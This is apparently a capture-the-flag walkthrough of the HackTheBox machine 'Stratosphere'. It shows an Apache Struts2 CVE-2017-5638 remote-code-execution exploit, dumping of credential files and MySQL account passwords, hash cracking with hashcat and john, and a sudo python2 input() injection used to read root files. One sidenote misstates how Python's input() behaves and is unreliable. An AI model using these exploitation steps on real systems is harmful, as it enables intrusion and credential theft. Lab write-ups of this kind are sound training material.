1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.64 # 22/tcp open ssh # 80/tcp open http # 8080/tcp open http-proxy nmap -oA stratosphere -p22,80,8080 -sC -sV -v 10.10.10.64 # 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0) # | ssh-hostkey: # | 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA) # | 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA) # |_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519) # 80/tcp open http # | http-methods: # | Supported Methods: GET HEAD POST PUT DELETE OPTIONS # |_ Potentially risky methods: PUT DELETE # |_http-title: Stratosphere # 8080/tcp open http-proxy # | http-methods: # | Supported Methods: GET HEAD POST PUT DELETE OPTIONS # |_ Potentially risky methods: PUT DELETE # |_http-open-proxy: Proxy might be redirecting requests # |_http-title: Stratosphere
2. Explore HTTP service
[x] Run dirbuster on http://10.10.10.64
[x] WORDLIST: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[-] /manager
[-] /Monitoring
[x] Navigate to http://10.10.10.64/Monitoring
[x] REDIRECTS TO: http://10.10.10.64/Monitoring/example/Welcome.action
[x] Exploit using CVE-2017-5638
git clone https://github.com/immunio/apache-struts2-CVE-2017-5638.git # Edit "exploit3.py" # # url = 'http://10.10.10.64/Monitoring/example/Welcome.action'
[x] Run RCE exploit
python exploit3.py "cat /etc/passwd"
# root:x:0:0:root:/root:/bin/bash
# richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash
# tomcat8:x:115:119::/var/lib/tomcat8:/bin/bash
# mysql:x:116:120:MySQL Server,,,:/nonexistent:/bin/false
python exploit3.py "cat /etc/tomcat8/tomcat-users.xml"
# username="teampwner"
# password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$"
# roles="manager-gui,admin-gui"
#
# Attempt to login to http://10.10.10.64/manager
# ///RABBIT HOLE
python exploit3.py "ls -la"
# -rw-r--r-- 1 root root 68 Oct 2 2017 db_connect
python exploit3.py "cat db_connect"
# [ssn]
# user=ssn_admin
# pass=AWs64@on*&
#
# [users]
# user=admin
# pass=admin
python exploit3.py "mysql -uadmin -padmin -e \"SHOW databases;\""
# users
python exploit3.py "mysql -uadmin -padmin -e \"USE users; SHOW tables;\""
# accounts
python exploit3.py "mysql -uadmin -padmin -e \"USE users; SELECT * FROM accounts;\""
# fullName = Richard F. Smith
# password = 9tc*rhKuG5TyXvUJOrE^5CK7k
# username = richard
3. Generate User Shell
ssh -l richard 10.10.10.64 # richard@10.10.10.64's password: 9tc*rhKuG5TyXvUJOrE^5CK7k
[x] While inside shell:
ls -la # -rwxr-x--- 1 root richard 1507 Mar 19 15:23 test.py # -r-------- 1 richard richard 33 Feb 27 2018 user.txt cat user.txt # e610b298611fa732fca1665a1c02336b
4. Attempt Privilege Escalation (richard -> root)
[x] Check privileges
sudo -l # (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
#!/usr/bin/python3
import hashlib
def question():
q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
md5 = hashlib.md5()
md5.update(q1.encode())
if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
print("Sorry, that's not right")
return
print("You got it!")
q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
sha1 = hashlib.sha1()
sha1.update(q2.encode())
if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
print("Nope, that one didn't work...")
return
print("WOW, you're really good at this!")
q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
md4 = hashlib.new('md4')
md4.update(q3.encode())
if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
print("Yeah, I don't think that's right.")
return
print("OK, OK! I get it. You know how to crack hashes...")
q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
blake = hashlib.new('BLAKE2b512')
blake.update(q4.encode())
if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
print("You were so close! urg... sorry rules are rules.")
return
import os
os.system('/root/success.py')
return
question()
[x] Run test.py as sudo
sudo python ~/test.py # Solve: 5af003e100c80923ec04d65933d382cb # # ANSWER: kaybboo! # # SOLUTION: hashcat --force -m 0 [hash] /usr/share/wordlists/rockyou.txt # # Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff # # ANSWER: ninjaabisshinobi # # SOLUTION: hashcat --force -m 100 [hash] /usr/share/wordlists/rockyou.txt # # How about this? 91ae5fc9ecbca9d346225063f23d2bd9 # # ANSWER: legend72 # # SOLUTION: hashcat --force -m 900 [hash] /usr/share/wordlists/rockyou.txt # # Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943 # # ANSWER: Fhero6610 # # SOLUTION: john --format=Raw-Blake2 --wordlist=/usr/share/wordlists/rockyou.txt [hash] # # sh: 1: /root/success.py: not found # ///RABBIT HOLE -- DO FOR FUN
[x] Actual solution
echo '__import__("os").system("find /root -name root.txt")' | sudo python2 ~/test.py
# /root/root.txt
echo '__import__("os").system("cat /root/root.txt")' | sudo python2 ~/test.py
# d41d8cd98f00b204e9800998ecf8427e
SIDENOTES:[x] ~/test.py initializes as python3 (#!/usr/bin/python3)[x] Python3 input() is equivalent to eval(raw_input()) in Python2[x] UNIX wildcard was present in /usr/bin/python* in sudo -l[x] ~/test.py could be coerced to run as python2 where input() is less secure[x] input() in ~/test.py was unsanitized; therefore, exploitable
